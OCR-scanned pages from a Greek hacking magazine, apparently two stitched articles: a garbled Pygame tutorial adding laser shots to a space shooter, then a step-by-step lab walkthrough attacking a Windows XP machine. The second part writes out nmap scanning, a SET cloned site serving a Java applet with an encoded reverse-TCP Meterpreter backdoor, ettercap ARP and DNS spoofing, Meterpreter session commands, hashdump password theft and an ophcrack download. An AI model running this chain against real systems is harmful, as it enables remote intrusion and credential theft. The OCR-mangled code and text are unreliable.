else: 
return False 
Н συνάρτηση GoneAbove θα µας ενημερώνει αν η βολἠ ἐχει περάσει 
πάνω апо κάποιο ópio της οθὀνης (όταν βγαίνει апо την οθὀνη θα πρέπει 
va τη σβήνουμε). 


Αν πιστεύετε ОТ! έχουμε κάνει καλἠ δουλειά και от! TO Laser θα λειτουρ- 
γἠσει µε την πρώτη, εἶστε γελασμένοι! Ευτυχώς που δεν έχουμε προσθέ- 
σει ακόµα τους εξωγήινους, γιατὶ θα µας εἰχαν φάει λάχανο. Ας μείνουμε 
για λίγο ακόµα στην ἄγνοια και ας δούμε пос θα ενσωµατώσουμε AUTÒ 
TO --0 Θεὸς va το кау=!-- ὁπλο στο проуранна. 


Δυνατότητα βολἠς 


Н βολἠ αποτελεἰ µια δυνατότητα τόσο του δικού µας σκάφους, ὁσο και 
των εξωγήινων. Επομένως, δεν χρειάζεται να φτιάξουμε διαφορετικὀ 
Laser class yia τους εξωγήινους. Θα μπορούσαμε λοιπὸν να γράψουμε τη 
μέθοδο Fire στην υπερκλάση Craft, η οποία προορἰζεται yia ола τα δια- 
στημόπλοια (το δικὀ µας алла και των εξωγήινων). Πριν апо AUTÒ όμως 
θα πρέπει να προσθέσουμε κάποια πράγματα στον constructor: 


class Craft(object): 
def — init (self, imagefile, coord): 
self.shape - pygame.image.load(imagefile) 
self.ship width - self.shape.get width() 
self.ship height - self.shape.get height() 


self.rect - pygame.Rect(coord,(self.ship width, self. 
ship height)) 
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self.ship_midwidth = self.ship_width / 2 
self.firecolor-(255,0,0) 

self.firespeed - -800 

self.shotlength - 20 


Μόνο οι τἐσσερεις τελευταίες γραμμὲς προστέθηκαν σε αυτἠ τη φάση. To 
midwidth εἶναι το шоб πλάτος του διαστημοπλοίου. Όπως φαντάζεστε, 
TO Laser θα φεύγει апо τη “μύτη” του σκάφους μας, η οποία βρίσκεται 
στη μέση. Το χρώμα της βολἠς θα εἶναι κόκκινο (255,0,0) και η ταχύτητα 
-800. Μη σας παραξενεύει η αρνητικἠ τιµή: Το δικό нас Laser κινείται апо 
κάτω προς та πάνω! Ας δούμε тора και τη συνάρτηση Fire: 


def Fire(self): 


shot = Laser((self.rect[0]«self.ship midwidth, self. 
rect[1]),self.firecolor,self.shotlength,self.firespeed) 


return shot 
Με το midwidth εξασφαλἰζουµε от! η βολἠ θα εξέρχεται апо τη μέση του 
σκάφους. Н συνάρτηση επιστρἑφει ёха αντικείµενο τύπου Laser. О λὀγος 
θα φανεὶ σε λίγο. 


Δοκιμαστική βολή 


Δείχνοντας υπερβολικἠ εμπιστοσύνη στον εαυτὀ pac, εἰμαστε ἐτοιμοι για 
την πρώτη δοκιμή. Μένουν µόνο κάποιες γραμμὲς στο κύριο πρὀγραμμα. 


if key[K SPACE]: 
firelist.append(SpaceShip.Fire()) 


Εἰμαστε βέβαιοι от! καταλαβαίνετε пой πρέπει va τοποθετηθεἰ αυτή η 
γραμμὴ. Ὅμως τι εἶναι αυτὀ ro firelist; Το διαστημόπλοιόὁ µας µπορεί va 
ρίξει πολλὲς βολές! Δεν χρειάζεται να εξαφανιστεί η προηγούμενη, για 
να pi&oupe уға. Пос θα κρατήσουμε λογαριασμὸὀ για τις Волс που πρέπει 
να σχεδιάσουμε; Κάθε φορά που ρίχνουμε ша βολἠ, το αντικείµενο Laser 
που επιστρέφει η Fire αποθηκεύεται στη Ліста firelist. Φυσικά, αυτή n ài- 
στα αρχικοποιείἰται £&o апо τον κύριο βρὀχο του παιχνιδιού, κἄπως ἐτσι: 


firelist = [] 


'Exovrag µια λίστα µε ὀλεςτις βολές του σκάφους µας, εἶναι πολύ εὐκολο 
να κινήσουμε και va εμφανίσουμε την καθεµἰα. Κάτι τέτοιο µπορεί va 
γίνει προσθέτοντας τα ακόλουθα, αμέσως μετὰ τη γραμμὴ SpaceShip. 
Show(screen): 
for theshot in firelist: 

theshot.Move(time) 

theshot.Show(screen) 

if theshot.GoneAbove(0): 


firelist.remove(theshot) 


Αυτὸς o βρὀχος επαναλαμβάνεται τόσες φορὲς, ὁσες εἶναι οι αποθηκευ- 
μένες βολὲς στη firelist. Με τη βοήθεια της µεταβλητής theshot κινούμε 
κάθε βολἠ, την εμφανίζουμε στο παράθυρο και τέλος ελέγχουμε αν βρἰ- 
σκεται ЕКТОС της οθὀνης του παιχνιδιού. Σε aurr| την περίπτωση, η βολἠ 
πρέπει να τερματιστεί και διαγράφεται апо τη λίστα. 


Python Game Programming: Ready, set, fire! 
| 


FUEL ω ΘΙ .——011z 


LA =. 


Av τολµάτε, τρέξετε TOV κὠδικα µε τις αλλαγὲς που έχουμε περιγράψει 
ως тора. Αν δεν θέλετε να ντροπιαστεἰτε στο Υπεργαλαξιακὸ Συνέδριο 
Κβαντικἠς Τεχνολογίας, δείτε απλὠς την εικόνα 2. Τι εἶναι αυτὲς οι OUVE- 
χόμενες γραμμές; Εμεὶς θέλαμε va Laser και μάλιστα µε μήκος 20 pixel. 
Ωστόσο αν κρατήσουμε πατημένο το [SPACE] (το πλήκτρο =\Еруопот- 
σης) да πάρουμε µια σχεδὸν συνεχόμενη γραμμὴ προς та πάνω (θυμίζει 
λίγο то Parsec, το παιχνίδι του TI-99 που φαίνεται στην εικόνα 4). Βλέπε- 
τε, ἔχουμε ρυθμίσει το πληκτρολόγιο στον μέγιστο ρυθμό επανάληψης. Ti 
μπορούμε να κάνουμε γι΄ аито το πρὀβλημα; 


Διόρθωση βολἠς 


Εντάξει, για πρὠτη απὀπειρα δεν τα πήγαμε τόσο ἄσχημα. То φιάσκο 
НЕ το φόντο ἦταν σαφώς μεγαλύτερο. Χρειάστηκε να σκεφτούμε πολλά 
πράγματα και µας διέφυγε µόνο ἑνα: Το διαστημόπλοιο δεν θα πρέπει να 
ρίχνει νέα Вол, av η προηγούµενη δεν ἐχει ταξιδέψει για µια ελάχιστη 
απόσταση апо την αρχική της θέση. Με άλλα λόγια, το διαστημόπλοιο θα 
πρέπει να ρίχνει τις βολὲς του µε περιορισμένο puOpo. 


Αναρωτιέστε nog θα γίνει αυτό; Θα φτιάξουμε µια συνάρτηση η οποία 
θα δίνει την απόσταση της βολἠς απὀ ἑνα σημείο αναφοράς (τη γραµµή 
στην οποία βρίσκεται το σκάφος µας, τη στιγµή που ρίχνει τη βολὴ). 
Στον constructor rou Laser θα ορίσουμε µια επιπλέον παράμετρο yia την 
γραμμὴ αναφοράς: 
class Laser: 
def | init (self, coord, color, size, speed, refline): 
και да αποθηκεύσουµε προφανώς αυτή την τιµή: 
self.refline = refline 


Тора μπορούμε να γράψουμε τη συνάρτηση/µἐθοδο η οποία да υπολογἰ- 
ζει πόσο ἐχει ταξιδέψει η Вол: 


Εικόνα 4 

Από τα πλέον 
διάσημα games 
του ΤΙ-99/4Α, 

σε cartridge, то 
Parsec εἶναι ἑνα 
διαστημικὀ παιχνίδι 
НЕ side scrolling, 
σταθμούς ανεφοδι- 
ασμού, πολλαπλές 
πίστες ΚΙ ἑνα συνε- 
ХОНЕМО Laser. Ένα 
εκπληκτικό προσὀν 
του παιχνιδιού 
ἦταν η ομιλία -- 
για όποιον τυχερό 
εἶχε το speech 
synthesizer. Па 
τους праунатика 
παλιούς της парё- 
ac, ro Parsec ἦταν 
το επίσημο video 
game του εφηβι- 
кой τηλεπαιχνιδιού 
"Κόκκινοι γίγαντες, 
άσπροι νάνοι”, που 
κάποιοι βλέπαμε 
μετά μανίας στην 
κρατική τηλεό- 
ραση! 


34 


WV'HAGIKER 


ÁNAND 


def DistanceTravelled(self): 
return self.refline - self.y1 


Φυσικά, μετὰ апо αυτὲς τις αλλαγὲς στον constructor rou Laser да np£- 
πει να τροποποιήσουµε και τη μέθοδο Fire, ὥστε να ορίζει κατάλληλα το 
гей те: 


def Fire(self): 


shot = Laser((self.rect[0]«self.ship midwidth, self. 
rect[1]),self.firecolor,self.shotlength,self.firespeed,self. 
rect[1]) 


return shot 


Τέλος, да πρέπει va αλλάξουμε ка! το τµήµα rou κὠδικα nou ενεργοποι- 
εἶται µε το πάτημα του [SPACE]: 


if key[K SPACE]: 

if firelist: 
# Only fire if last shot has travelled a minimum distance 
if firelist[-1].DistanceTravelled() >= 150: 

firelist.append(SpaceShip.Fire()) 

else: 
it or if there is no shot 
firelist.append(SpaceShip.Fire()) 


To διαστημόπλοιο ρἰχνει μόνον όταν η προηγούμενη βολἠ ἐχει ταξιδέψει 
Ἀτουλάχιστον” 150 pixel апо τη γραμμὴ βολἠς. Πα να εξετάσουμε την 
τελευταία βολἠ --το τελευταίο στοιχεἰο της λίστας firelist-- Χρησιµοποι- 
οὖμε τη σύνταξη firelist[-1]. Φυσικά, το διαστημόπλοιο ρἰχνει βολἠ και 
σε uia ακόµα περίπτωση: Όταν δεν ἐχει ρἰξει καμία ἀλλη! Αυτὸ συμβαίνει 
отау η Ліста firelist εἶναι κενἠ. Σημειώστε от! αλλάζοντας то 150 р’ ἑναν 
μικρότερο αριθμὀ, µπορείτε να αυξήσετε την “πυκνότητα” των βολών 
(cheat mode ;) 


Ἠχος βολἠς! 


Χάρη στην PrepareSound που φτιάξαμε στο τελευταίο δικτυακὀ άρθρο 
της σειρἀς (υπαριθμὸν 5.5, http://deltahacker.gr/?p-5662), εἶναι поло 
εὐκολο να κάνουμε το Laser θορυβώδες! Ti εἰπατε; Στο διάστηµα δεν 
ἐχει αέρα κι ара δεν ακούγεται ἦχος; Паті, μήπως та αστέρια εἶναι δύο 
εικὀνες κολλημένες σε ρολὀ; Αφήστε τη φαντασία µας ἠσυχη, σας na- 
ρακαλούμε πολύ :) Σ’ ἑνα βολικὀ σημείο, πριν апо τον κύριο βρὀχο του 
προγράμματος, προσθέτουµε την ακὀλουθη γραμμή: 


laser = PrepareSound("shoot.wav") 


Тора, μπορούμε να προσθέσουµε τον ἦχο στη συνάρτηση Fire της υπερ- 
κλάσης Craft: 


laser.play() 


Μετά kai апо αυτά, το naixviói µας αρχίζει (επιτἐλους) va παἰρνει pop- 
ФИ! Έχουμε το κινούμενο φόντο, £xoupe τις Волс Laser, το σκάφος µας 
κινείται και ακούγεται μουσική. Μένει να υποδεχτούµε µόνο τους (χαμέ- 
νους апо χἐρι) εξωγήινους. Αυτὸ όμως θα γίνει στο επόμενο άρθρο! Στο 
μεταξύ, µπορείτε να κατεβάσετε τον κὠδικα του παρόντος ἄρθρου για να 
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def Shov[self, surface) 


surface.blittself. shape, (self. rect[61, self. rect[11)) 


def Hove(self,speed x,speed y, tine): 
qe Ek oe 
distance y = 
Self. rect. nove ана x,distance y) 


[eackgrou 7 : def Fire(self) 
=== Лаван pla; 

atari leat rect[6]«self.ship midwidth, 
cotor, seif: И НТН 


№ The class for our shig 


etass aft(Craft): 
de 


self.rect11) self. firel 


f, imagefile, coord, min coord, max coord): 


nin coor 


Eva απλό και γρήγοι 
3 height) 


"pygame-invaders.py" 211L, 6030C 


πειραματιστείτε: http://bit.ly/dhe10pyginvaders. Φυσικά, θα χρειαστείτε 
και ορισμένα αρχεἰα (εικόνας και ἠχου), τα οποία δώσαμε στο σχετικὀ 
άρθρο rou deltaHacker 009. 


Па va µην βαρεθεῖτε μέχρι το επὀµενο ар@ро, £xoupe εδώ μερικὲς μικρὲς 
ασκήσεις: 


ο O constructor yia то φόντο παἱρνει περιττὲς παραμέτρους. Έτσι και 
αλλιώς η πρώτη εικόνα ξεκινάει πάντα апо το [0,0] και η δεύτερη 
апо το [0, -screenheight]. Ξαναγράψτε τον ὥστε να παίρνει ως 
μοναδικἠ παράμετρο ro screenheight και απλοποιἠήστε εσωτερικἀ 
τη λειτουργία του. 


e Н βολἠ δεν φαίνεται να ξεκινάει ακριβώς апо τη μύτη του διαστη- 
µοπλοίου αλλά апо λίγο πιο πάνω. Διορθώστε то. 


ο [ia τους εξωγήινους θα χρησιμοποιήσουμε το 1610 Laser, алла και 
την ἴδια συνάρτηση Fire rou Craft class. Ωστόσο δεν θέλουμε то 
Laser των εξωγήινων να παράγει ἠχο. Γράψτε µια συνάρτηση Fire 
στην κλάση SpaceShip, η οποία να περιέχει τη γραμμὴ laser.play() 
και να καλεἰ έπειτα τη γονικἡ συνάρτηση Fire. Σβήστε ro laser. 
play() апо τη γονικἠ συνάρτηση. 


ο Οι βολές των εξωγήινων θα κινούνται (προφανώς) προς τα κάτω. 
Γράψτε µια συνάρτηση GoneBelow, yia να ελέγχετε πὀτε οἱ βολὲς 
τους έχουν φύγει εκτὸς οθὀνης -- αλλά апо την κάτω μεριὰ! 


Кала ξενύχτια, αλλά µε μέτρο τα αναψυκτικά. Έχουν πολύ καφεΐνη! 


(SpaceCraft,self), init (imagefile,coord) 
d 


Self nax coord С (mak coordie]-seLf.ship width, wax coord[1]-setf.ship 


52,24 20% 


Εικόνα 5 

To desktop ενός 
Pygame developer 
δεν µπορεί va µην 
περιέχει: Тоилах!- 
στον £va terminal 
(ка! βλέπετε ότι 
χρησιμοποιούμε 
Mercurial version 
control yia ra 
арбра αλλά και yia 
TOV κὠδικα), ἑναν 
*ооВаро* editor 
(δηλαδή то дит) 
αλλά kai то Gimp, 
για να πειράζουµε 
όσο χρειάζεται Та 
урафика рас. О 
Beastie, στην κότω 
δεξιά γωνία, µας 
προφυλάσσει απὀ 
алла кака δαιμόνια 
και θυμίζει σε 
όλους τι λειτουρ- 
γικὀ προτιμάμε |) 
Α, και µιας κι όλως 
τυχαίως αναφερ- 
θήκαμε σε version 
control, διαβά- 
στε αν θέλετε τα 
σχετικά άρθρα στα 
deltaHacker 003 
kai 004. 
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hashes, cracking, 
AM πρόφιτ φυοικά >) 


орпсгаск 


Στο άρθρο που αρχίζει апо τη σελίδα 12 | 
παρουσιάσαµε επιθέσεις σε Windows XP και 
Windows 7 boxes, µε στόχο την απόκτηση 

TOV user passwords. О attacker εἶχε φυσικἠ 

πρόσβαση στους υπολογιστὲς των θυμάτων, 
καθώς και µια κἄποια άνεση χρόνου. Τι γίνεται 
όμως στις περιπτώσεις που η φυσικἠ πρὀσβαση 

δεν αποτελεί επιλογή; 
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To ερώτημα δημιουργεἰται φυσιολογικά και εἶναι προφανὲς от! δεν uno- 
ρούμε va то αγνοήσουμε. Και pači u’ αυτό, ακολουθούν κι άλλα: Пос 
апоктан= απομακρυσμένη πρόσβαση с’ ἑνα Windows box; Τι μπορούμε 
να κάνουμε, αφού τα καταφέρουμε; Στο παρὀν άρθρο та апаутанЕ, μέσα 
апо ша επἰδειξη σχετικἠς επίθεσης. 


Επιθυµητὸς στὀχος 


Θέλουμε µε κάποιο τρόπο να εγκαταστἠήσουµε ¿va backdoor oro Windows 
box του θύματος, oore va πάρουμε πλήρη πρόσβαση εκεί. Μεταξύ ἄλλων, 
αναζητούμε боа περισσότερα γίνεται апо τα passwords των χρηστών του 
box. Καθ’ ὁλη τη διάρκεια της επίθεσης δεν έχουμε φυσική πρὀσβαση 
στον υπολογιστή-στόχο, κι ὁ,τι γίνεται, γίνεται δικτυακά. 


Περιβάλλον επίθεσης, προαπαιτούμενα 


Πα τις ανάγκες τις παρουσἰασἠς µας δουλεύουμε εντὸὀς ενὸς εικονικού 
LAN, µε virtual machines (VMs) бпиюурупнёма апо ro VirtualBox. Σε 
περίπτωση nou --λέμε тфра-- δεν έχετε δαμάσει ακόµη ro VirtualBox, 
σας προτείνουμε να διαβάσετε το σχετικὀ άρθρο στο site του περιοδικού: 


http://deltahacker.gr/?p-2667 


To box rou υποψήφιου θύματος трёх=! Windows ΧΡ SP3, έχει ro firewall 
της Microsoft ενεργοποιημένο και εἶναι πλήρως ενημερωμένο ue та πλέον 
πρόσφατα security updates. Επίσης, θεωρείται δεδομένο ὁτι va τέτοιο 
μηχάνημα θα τρέχει *kar* antivirus. 


Κατὰ τη διάρκεια των δικὠν µας δοκιμών, το antivirus ἄλλοτε δεν αντι- 
λαμβανόταν το backdoor και η επίθεση προχωρούσε ομαλά (περίπτωση 
Microsoft Security Essentials), άλλοτε όμως το εντόπιζε και η επίθεση 
αποτύγχανε παταγωδώς (περίπτωση АМС 2012 Free Edition). Στα πλαίσια 
της παρουσἰασἠς µας, λοιπόν, η οποία παρεμπιπτόντως δεν αφορά σετε- 
χνικὲς antivirus evasion, θα υποθέσουμε от! το antivirus eire απουσιάζει 
απὀ ro μηχάνημµα-στόχο εἰτε от! εἶναι απενεργοποιημένο. Τέλος, στον 
υπολογιστή του θύματος εἶναι εγκατεστημένη n Java. 


Όσο για ro box rou επιτιθέµενου, εδώ τα праурата εἶναι πολύ πιο апла: 
Арк=! να τρἐχει το BackTrack Linux και va ‘ма! πλήρως ενημερωμένο -- 
όπως επἰσης και τα διάφορα εργαλεία στα οποία θα καταφύγει ο attacker 
(SET, Metasploit к.а.). 


Н επἴθεση, βήμα προς βήμα 


Θέλουμε να παρασύρουμε το υποψήφιο θύμα ώστε να επισκεφτεί ἑναν 
κλώνο κάποιου --ὀχι κατ’ ανάγκη πασἰγνωστου-- δικτυακού τόπου. О 
κλώνος θα σερβίρεται апо ro box µας. Ката την επἰσκεψη ενὸς χρήστη 
στο Site-KkAovo, θα του ζητείται η εγκατάσταση ενὸς Java applet. Όταν 
τη δέχεται, στην ουσία θα εγκαθιστἀ ἑνα backdoor το οποίο θα µας õi- 
νει απομακρυσμένη πρόσβαση στον υπολογιστή του, μέσω της γραμμἠὴς 
εντολών. 


Βήμα 1. Апо µια κονσόλα rou BackTrack τρέχουμε то птар, ὥστε να 
εντοπἰσουµε ra IPs όλων των μηχανημάτων του τοπικού δικτύου: 


root@bt:~# птар -Ρθ -O 192.168.56.0/24 
Στο (εικονικὀ) LAN του παραδεἰγματὸς µας υπάρχουν τρία μηχανήματα: 


Βσκήσεις anopakpuouévnc πρόσβασης 
ИИ 


Applications Places System [>] 30°С Мед и! 11, 01:16 


х rootGbt: ~ 


File Edit View Terminal Help 


'Eva урпуоро port 
scanning с’ όλο то τοπικὀ 
δίκτυο (1) φανερώνει το 
IP rou router (2), του 
ипхаупратос µας (3) κι 
εκείνο TOU στὀχου (4). 


К Applications Places System °С WedJul11,01:18 


х root@bt: /pentest/exploits/set 


File Edit View Terminal Help 


А New Beginning 
davekgtrustedsec.com 


нотер https://www. trustedsec. com 


welcome to the Social-Engineer Toolkit (SET). Your one 
stop shop for all of your social-engineering needs 


The Social-Engineer Toolkit is a product of TrustedSec. 


Visit: https://www.trustedsec.com 


την πρώτη φορά пои 

да τρέξουμε ro SET 
μπορούμε, προαιρετικά, 
να αναβαθµίσουμµε то ідо 
καθώς ка! то Metasploit, 
στο οποίο βασίζεται. 


ΤΊ root@bt: /pentest/expl... 
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O router (pfSense VM), µε IP то 192.168.56.5, то BackTrack rou eniri0£- 
μενου, НЕ IP ro 192.168.56.120, καθώς και το Windows XP box rou θύμα- 
τος, µε IP то 192.168.56.122. Σημειώστε от! στο δικὀ σας εργαστήριο то 
δίκτυο δεν да 'vai кат’ ανάγκη ro 192.168.56.0/24. Av δεν калокатала- 
Bare auró ro τελευταἰο σχόλιο, τότε προτείνουμε va διαβάσετε το ар@ро 
περὶ subnetting που έχουμε δημοσιευμένο online: 


http://deltahacker.gr/?p-5138 


Βήμα 2. Merafaivouus στον κατάλογο rou SET (Social-Engineer Toolkit) 
root(bt:-4 cd /pentest/exploits/set 

και τρέχουμε ro проуранна δίνοντας 
root(bt:/pentest/exploits/setit ./set 


Προαιρετικἆ, αναβαθμὶἰζουµε ro SET (επιλογἠ 5) αλλά *ка!* ro Metasploit 
(επιλογἠ 4). 


Βήμα 3. Апо το σύστημα μενού rou SET, ακολουθούμε τη διαδρομἠ 
1) Social-Engineering Attacks --> 
2) Website Attack Vectors --» 
1) Java Applet Attack Method --» 
2) Site Cloner 


To SET μὰς Gnrà то URL ενὸς site, ὡστε va δημιουργήσει vav τοπικὀ 
κλώνο της πρώτης rou σελἰδας. Πριν του δώσουμε οτιδήποτε, с’ ἑνα ἄλλο 
τερματικὀ φροντίζουμε ώστε о Apache web server να ναι απενεργοποιη- 
μένος. Επειδἠ το SET ἐχει τον OIKÓ του web server, εννοεἰται πως δεν θα 
θέλαμε капота διένεξη µε τον Apache: 


root@bt:~# service apache2 stop 


Ωραία. Πίσω ото τερματικὀ µε το SET, πληκτρολογούμε ro URL ενὸς site 
(μαζί µε ro https:// rj το http://), αλλά ох! οποιουδήποτε: Καλό εἶναι va 
δώσουμε ἑνα site nou το υποψήφιο θύμα да ἠθελε να επισκεφτεί. Στα 
nÀaicia rou παραδεἰγματός µας, εμεὶς δώσαμε το http://codebender.cc 
(Περάστε µια βόλτα, εἶναι αρκετά ενδιαφἑρον :D) 


Στη συνέχεια, το SET θέλει va διαλέξουμε ποιο payload θα "ενσωμα- 
тоо” сто Java Applet που θα κληθεί να τρέξει ο επισκέπτης του κλω- 
νοποιημένου site. Επιλέγουµε το 2, δηλαδἠ το Windows Reverse ТСР 
Meterpreter. Προκειμένου το backdoor που ουσιαστικά φτιάχνουμε va 
μην εἶναι ανιχνεύσιμο апо то ὁποιο antivirus, οφείλουμε va κωδικοποιἠ- 
соор ro payload. Ως μέθοδο κωδικοποίησης µπορείτε να διαλέξετε ὁποια 
θέλετε, µια και στα πλαίσια της συγκεκριμένης επἰδειξης ro antivirus εἶναι 
σαν να µην υπάρχει (ακόµα δηλαδὴ και να εἶναι εγκατεστημένο στον OTÓ- 
χο, φροντίζουμε και το απενεργοποιούμε). 


О listener, εξάλλου, εἶναι µια διεργασία rou Metasploit nou θα τρέχει 
στο μηχάνημα rou attacker ка! θα περιμένει συνδέσεις апо ro backdoor, 
το onoio θα βρίσκεται στο απομακρυσμένο μηχάνημα. Του αφήνουμε то 
προκαθορισμένο port, που εἶναι το 443. Αμέσως μετὰ το SET φτιάχνει то 
payload, το κωδικοποιεί, το εισάγει στον κὠδικα του κλωνοποιηµένου site 
σε μορφὴ Java Applet, και ξεκινὰ τον listener. 
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Applications Places System [5] 
х root@bt: /pentest/exploits/set 
File Edit View Terminal Help 


4.293. Wed jul 11, 02:14 


Αφού ro SET κλὠνοποιή- 
σει TO Site που TOU ипо- 
δεικνύουμε, ζητά va TOU 

υποδείξουµε éva payload 
yia va "ενσωματώσει” σε 
Java applet που да σερ- 

βίρεται στους επισκέπτες 
του κλωνοποιημένου site. 


[*] Cloning the website: http://codebender.cc 
[*] This could take a little bit 


Э 22800 lex 


Applications Places System &29°С Мей ји 11, 02:15 


х root@bt: /pentest/exploits/set 
File Edit View Terminal нар 


[*] Cloning the website: http://codebender.cc 
[*] This could take a little bit 


Επιλογή μεθόδου κωδικο- 
ποίησης rou payload, µε 
στόχο TO προσπέρασµα του 
όποιου antivirus στο υπολο- 
γιστή του θύματος... 


TERIS | 
771 root@bt Jpentestiexpl... Д 
POO Miete 
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Βήμα 4. Θἐλουμετο υποψήφιο θύμα να επισκεφθεί το http://codebender.cc, 
алла αντί yia το κανονικὀ site va βρεθεἰ στο κλωνοποιημένο nou σερβἰ- 
ρει το SET. To пос θα πεἰσουμε το θύμα να πἀει στο site εἰναι ἑνα θέμα 
που λύνεται µε λίγη κοινωνικἠ µηχανικἠ. Εξάλλου, η επιλογή rou site 
προς κλωνοποίηση δεν тау τυχαία, ἐτσι δεν εἶναι; Υπάρχει орос και то 
τεχνικὸ ζήτημα της υπόθεσης: Πείτε от! τον καταφέραμε. Пос θα συμβεἰ 
πράγματι να ξεκινήσει για то http://codebender.cc αλλά va βρεθεἰ στον 
KAovo; Μα, πολύ апла, εξαπολύοντας апо πριν µια επίθεση Man in The 
Middle µέσω ARP spoofing, κι επἰσης κάνοντας λίγο DNS spoofing! Περισ- 
σότερα yia το πρωτόκολλο ARP, τις επιθέσεις МТМ µέσω ARP spoofing 
και πὼς ακριβώς λειτουργούν, μπορείτε να διαβάσετε στα σχετικἁ ἀρθρα 
του deltaHacker 001. Αυτή τη фора, avri yia τα συνηθισμένα εργαλεἰα 
arpspoof και dnsspoof, θα καταφύγουμε στις υπηρεσίες rou ettercap. 


Στην περίπτωση nou το ettercap δεν εἶναι ἠδη παρὀν oro BackTrack µας, 
TO εγκαθιστούµε апо ἑνα νέο παράθυρο τερματικού ως ακολούθως: 


root@bt:~# apt-get install ettercap 


ПрохоранЕ ανοἰγοντας ro αρχείο /usr/local/share/ettercap/etter.dns, µε 
TOV αγαπημένο µας text editor. Παράδειγμα: 


root@bt:~# nano /usr/local/share/ettercap/etter.dns 
Στο τέλος του αρχείου προσθέτουμε µια και μόνο γραμμὴ: 
codebender.cc А 192.168.56.120 


Av θυμόσαστε, ro 192.168.56.120 εἶναι то IP rou BackTrack box (στην 
περἰπτωσή σας θα εἰναι κἄποιο ἆλλο ка! үа να το βρείτε ανοίξτε éva 
τερματικὀ και δώστε ifconfig). Αποθηκεύουμε τις αλλαγές στο etter.dns 
κι εγκαταλείπουµε rov editor (για ro nano, п.х., θα δώσουμε [CTRL4OJ, 
[Enter] και µετά [CTRL4X]). 


τρέχουμε тора το еКегсар ως εξής: 


root(bt:-4 ettercap -q -T -i еһе -P dns spoof -M arp:remote 
/182.168.56,5/ /192.1068.56.122/ 


Ας δούμε τις παραμέτρους που μόλις δώσαμε oro ettercap. 


-α Το проуранна εκτελείται ἠσυχα, εμφανίζοντας µόνο т’ anapai- 
τητα μηνύματα στην οθὀνη. Με το πλήκτρο [Space] ενεργοποιούὐµε/απε- 
νεργοποιούµε την εμφάνιση μηνυμάτων και των δεδομένων που оміфа- 
ρονται. 


-T Ζητάμε апо ro ettercap να τρέξει ενεργοποιώντας ro text 
interface του. 


-i Υποδεικνύουµε ro network interface nou θα χρησιμοποιηθεί για 
το sniffing. Στο μηχάνημά µας υπήρχε µόνο μία карта δικτύου, η ethO. 
-Р Αυτἠ η παράμετρος ακολουθείται апо то ὀνομα ενὸς plugin προς 
φόρτωμα. Εμεἰς θέλουμε ro dns, spoof plugin, για DNS spoofing. Τσάμπα 
τροποποιήσαμε το etter.dns; 

-М Πραγµατοποίηση επίθεσης МТМ μεταξὺ του στόχου και του 
router του LAN. Όλη η κυκλοφορία μεταξύ των δύο αυτών σημείων θα 
διέρχεται απὀ το μηχάνημά µας! 


Βήμα 5. Έχοντας а) ro SET να σερβίρει το κλωνοποιημένο site µε то 
«πειραγμένο” Java Applet, B) τον listener rou Metasploit να περιμένει, 
Y) την επίθεση ARP spoofing σε ξέλιξη και ὃ) то DNS spoofing plugin 
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Επίθεση ΜΙΤΜ µέσω ΑΕΡ 
spoofing µε τη βοήθεια 

гез р E тои ettercap. Παρατηρή- 
στε ότι TO plugin ονόματι 

dns spoof έχει φορτωθεί, 
µιας και πἐρα απὀ το АВР 
18 ervice spoofing µας ενδιαφέρει 
ο *ка!* ro DNS spoofing. 
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and Setting 


Av το υποψήφιο θύμα έκανε éva ping aro codebender.cc ка! παρατηρού- 
σε την ἐξοδο του εργαλείου, αμέσως Ва καταλάβαινε πως кат! δεν πάει 
καλά. Αλλά γιατί va κάνει ping; Εσείς δηλαδή κάνετε ping о’ ола ra site 
που проката! να επισκεφθείτε; Αν πάντως η προοπτικἠ µιας επίθεσης 
ARP spoofing các θορυβεί, δεν χρειάζεται у’ ανησυχείτε. Τρόποι προστα- 
σίας υπάρχουν ка! αναφέρονται σε σχετικὀ άρθρο που έχουµε δηµοσιευ- 
НЕМО στο http://deltahacker.gr/?p-1583 
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TOU ettercap φορτωμένο, το µόνο που μένει тора εἶναι va περιμένουμε 
το υποψήφιο θύμα να επισκεφθεί то http://codebender.cc. Με το nou θα 
γίνει κι αυτὀ, θα του ζητηθεί να δεχτεἰ την εκτέλεση ενὸς Java applet. 
Αν έχουμε κάνει калі δουλειἁ ως κοινωνικοἰ μηχανικοί, да тп δεχτεί. 
Αμέσως да δημιουργηθεί va κανάλι επικοινωνἰας (session) μεταξύ του 
Meterpreter, στο BackTrack του επιτιθέµενου, και του στὀχου. Πα τη ou- 
νέχεια, ο χρήστης rou απομακρυσμµένου Windows box θα βλέπει διαρκὠς 
νέα παράθυρα nou θα του ζητούν να επιτρέψει την εκτέλεση ενός Java 
Applet. Καθε фора που θα δέχεται, ἑνα v£o session θα δημιουργείται. 
Аруа ἡ γρήγορα βέβαια θα χάσει την υπομονή rou και eire θα αρνηθεἰ την 
εκτέλεση του Applet eire θα κλείσει то tab µε το http://codebender.cc. 
Αυτὸ καθόλου δεν πειράζει, αφού ο επιτιθέμενος Ва ἐχει бп τουλαχιστον 
va session ανοικτὀ προς το μηχάνημα του θύματος. 


Βήμα 6. Στο τερµατικὀ που τρέχει το SET --yia την ακρίβεια εκεἰ nou 
тора εἶναι φορτωμένο ro Metasploit--, δίνουμε 


sessions -1 


και βλέπουμε ола τα διαθέσιμα sessions προς το μηχάνημα του θύματος, 
µε та αντίστοιχα IDs. Πληκτρολογώντας, N.X., 


sessions -i 1 


αρχίζουμε την αλληλεπίδραση µε ro session nou ἐχει ID 1. Πα va δούμε 
ὁλες τις εντολὲς που µας παρέχει ο Meterpreter, δίνουμε 


help 


Δοκιμάστε αρχικά τις 15, рма, cd, sysinfo και ps. Εἶναι προφανὲς от! αλω- 
νίζουµε μέσα στο &£vo σύστημα! 


Βήμα 7. Μια θαυμάσια εντολἠ Tou Meterpreter εἶναι η hashdump. Δώστε 
τη και πάρτε όλα ra password hashes του συστήματος στο πιάτο! Με 
το ποντίκι κάντε апла copy την ἐξοδο της hashdump апо το τερματικὸ, 
μετὰ paste σ΄ ἑνα νέο text file και φυσικά αποθηκεύστε το κάπου στο 
BackTrack σας. Ακολούθως, апо éva ἆλλο τερµατικὀ εγκαταστήἠστε то 
ophcrack: 


root(bt:-4 apt-get install ophcrack 


Πριν τρέξετε ro проуранра κατεβάστε ro rainbow table ονόματι «XP free 
fast», δίνοντας с’ ἑνα τερµατικὀ 


root@bt:~# wget http://downloads.sourceforge.net/ophcrack/ 
tables xp free fast.zip 


